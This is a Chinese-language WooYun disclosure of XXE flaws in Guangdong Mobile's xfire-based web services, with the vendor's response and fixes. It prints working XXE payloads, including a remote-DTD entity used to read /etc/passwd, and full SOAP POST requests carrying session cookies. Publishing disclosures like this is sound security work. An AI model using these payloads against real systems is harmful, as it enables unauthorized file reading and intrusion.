当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167677

漏洞标题:广东移动重要系统XML实体注入漏洞

相关厂商:中国移动广东省分公司

漏洞作者: applychen

提交时间:2016-01-06 11:34

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

XML实体注入漏洞

详细说明:

其实还是xfire导致XXE问题,详细见我上一个漏洞分析http://**.**.**.**/bugs/wooyun-2016-0166751
首先是广东和教育使用了xfire实现webservice:

http://**.**.**.**/webservices


1.png


使用WVS导入以下链接:

http://**.**.**.**//webservices/IHDZWXxtWs?wsdl


2.png


使用http editor编辑POST数据包填入EXP发送,曝出路径:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "a">%remote;]>


3.png


然后根据路径去读取各个敏感文件(或者列目录),这里只读取/etc/passwd进行演示:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://ip/1.xml">%remote;]>


4.png

5.png


第二处存在于4avpn中:

https://**.**.**.**/webservices/RoamService?wsdl


6.png


这里需要访问首页获取一个COOKIE然后填入POST包,如下:

POST https://**.**.**.**/webservices/RoamService HTTP/1.0
SOAPAction: ""
Content-Type: text/xml
Cookie: NSC_AAAC=5602e6da7daa89762a1a2c64b6e7284a; NSC_DBTQ_**.**.**.**_443_mcwjq=ffffffff09f3f59345525d5f4f58455e445a4a42378b; JSESSIONID=00007rCbPz7dnd-c9aagCpSz5n4:16duo2of2
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "**.**.**.**">%remote;]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" xmlns:soap="http://**.**.**.**/wsdl/soap/"  xmlns:xsd="http://**.**.**.**/1999/XMLSchema"  xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance"  xmlns:m0="http://**.**.**.**/"  xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/" xmlns:urn="http://**.**.**.**/RoamService">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:applyRoamTicket>
           <urn:in0>1</urn:in0>
        </urn:applyRoamTicket>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


7.png


这里服务器在内网无法对外连接,当使用公网地址时候程序会陷入延迟:

POST https://**.**.**.**/webservices/RoamService HTTP/1.0
SOAPAction: ""
Content-Type: text/xml
Cookie: NSC_AAAC=5602e6da7daa89762a1a2c64b6e7284a; NSC_DBTQ_**.**.**.**_443_mcwjq=ffffffff09f3f59345525d5f4f58455e445a4a42378b; JSESSIONID=00007rCbPz7dnd-c9aagCpSz5n4:16duo2of2
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "**.**.**.**:8080/">%remote;]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" xmlns:soap="http://**.**.**.**/wsdl/soap/"  xmlns:xsd="http://**.**.**.**/1999/XMLSchema"  xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance"  xmlns:m0="http://**.**.**.**/"  xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/" xmlns:urn="http://**.**.**.**/RoamService">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:applyRoamTicket>
           <urn:in0>1</urn:in0>
        </urn:applyRoamTicket>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


XXE还会导致DOS,DOS影响太大不可控这里就不测试了。

漏洞证明:

同上

修复方案:

1、移动中使用xfire的系统还是挺多的可以自查一下
2、升级为CXF或者过滤<!DOCTYPE等关键字

版权声明:转载请注明来源 applychen@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-01-08 21:56

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无